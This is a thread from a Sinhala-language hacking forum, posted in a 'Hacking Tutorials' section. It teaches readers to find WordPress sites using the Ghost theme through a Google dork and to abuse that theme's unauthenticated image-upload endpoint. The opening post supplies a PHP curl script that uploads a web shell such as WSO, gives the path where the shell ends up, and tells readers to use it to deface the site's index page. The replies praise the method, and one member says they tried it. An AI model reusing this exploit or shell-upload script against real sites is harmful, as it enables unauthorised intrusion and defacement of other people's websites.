1. Guest ඔබ ශ්‍රී Mafia වෙත සාදරයෙන් පිලිගන්නවා.. අපත් සමග එකතු වී අලුත් දැනුම සොයා යන්න පෙළ ගැසෙන්න !!
    Dismiss Notice
Dismiss Notice
ආයුබෝවන් Guest ඔබ කැමතිද අපගේ Security Services එක සමග එකතු වී වැඩ කරන්න එසේනම් මෙතනින් එන්න

Wordpress Them එකේ ver එකෙන් සයිට් එකකට ගේමක් ගහමු

Discussion in 'Hacking Tutorials' started by Maniax, Dec 2, 2016.

  1. Maniax

    Maniax Member

    Joined:
    Nov 13, 2016
    Messages:
    51
    Likes Received:
    25

    මේක පොදු වැඩක් ඉතින් එකෙන් පුළුවන් මෙහෙම ගේමක් ගහන්න
    මෙන්න මේ ද්රෝක් එක Google කරන්න .. හරිද
    Dork: inurl:wp-content/themes/Ghost/


    හරි නේද ඊට පස්සේ එන සයිට් වලින් ටිකක් පහලින් එකක් තොර ගන්න
    මෙන්න මේක තමයි exploit එක
    exploit: /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

    ඔයාල තොර ගනිපු සයිට් එකේ අන්තිමට ඒ කියන්නේ Example.com//wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php ඔන්න ඔහොම ගහල බලන්න එතොකොට
    මේ වගේ එරෝ එකක් එනවනම් අපිට ගේම ගහන්න පුළුවන් ~ {"status":"NOK", "ERR":"This file is incorect"}



    හරි ඊට පස්සේ අපි මෙන්න මේ වගේ Php ෆයිල් එකක් හදා ගන්න ඕනේ....
    <?php
    $uploadfile="namashell.php";
    $ch = curl_init("target.xxx/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata'=>"@$uploadfile"));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";
    ?>
    මේකේ ෂෙල් එකට අපිට namashell.php එකට wso එක උනත් පාවිච්චි කරන්න පුළුවන්
    target.xxx එකට ඔයාල ටර්ගට් කරන සයිට් එකැ දෙන්න හරි නේ දැන්

    ඊට පස්සේ ෂෙල් එක මෙන්න මේ වගේ CMD එකේ හෝ Xammp එකේ ෂෙල් එකේ රන් කරවන්න


    [​IMG]


    හරි ටික වෙලාවක් යද්දී ෂෙල් එක අප්ලෝඩ් වේවි
    දැන් ඔයාල අප්ලෝඩ් කරපු ෆයිල් එක මෙන්න මේ Url එකේ තියෙනවා

    target.xxx/wp-content/uploads/settingsimages/namashell.php

    ඊට පස්සේ ඔයලට ෂෙල් එක පාවිච්චි කරල ඉන්ඩෙක්ස් එක එඩිට් කරලා ඔයාලගේ දිෆෙස් පජ් එක දාගන්න පුළුවන්..
    සරල ලෙසයි ... මම ටියුට් ලියන්නම් දන්නේ නැ පුළුවන් විදියට ලිව්වා මේක ගැන ගැටළුවක් තියෙන්වම් අහන්න

    Expolit එක Admin බ්‍රොට යැව්වා පොර අප්ලෝඩ් කරලා ලින්ක් එක දාවි

    Download Expolit

    මම ගහපු ගේමක්
     
    #1
    Shadow and Viper like this.
  2. Viper

    Viper Administrator
    Staff Member

    Joined:
    Sep 24, 2016
    Messages:
    75
    Likes Received:
    32
    එළකිරි.... බ්‍රෝ වීඩියෝ එකක් දැම්මනම් අපේ සාමාජිකයන්ට බලාගන්න ලේසි වේවි
     
    #2
    Shadow likes this.
  3. Harith Dilshan

    Joined:
    Dec 1, 2016
    Messages:
    36
    Likes Received:
    6
    මරු බම් මාත් කරල බැලුවා
     
    #3
  4. Anon LK

    Anon LK New Member

    Joined:
    Dec 2, 2016
    Messages:
    16
    Likes Received:
    7
    mehema ekk enawane
     

    Attached Files:

    #4
    UKBoy001 and Shadow like this.
  5. Elite_x

    Elite_x Moderator
    Staff Member

    Joined:
    Oct 11, 2016
    Messages:
    55
    Likes Received:
    36
    hemathenama oka ne kiyana 1th mathaka thyaganna one a.
     
    #5
  6. UKBoy001

    UKBoy001 New Member

    Joined:
    Jan 27, 2017
    Messages:
    1
    Likes Received:
    0
    Please step by step instructions !
     
    #6

Share This Page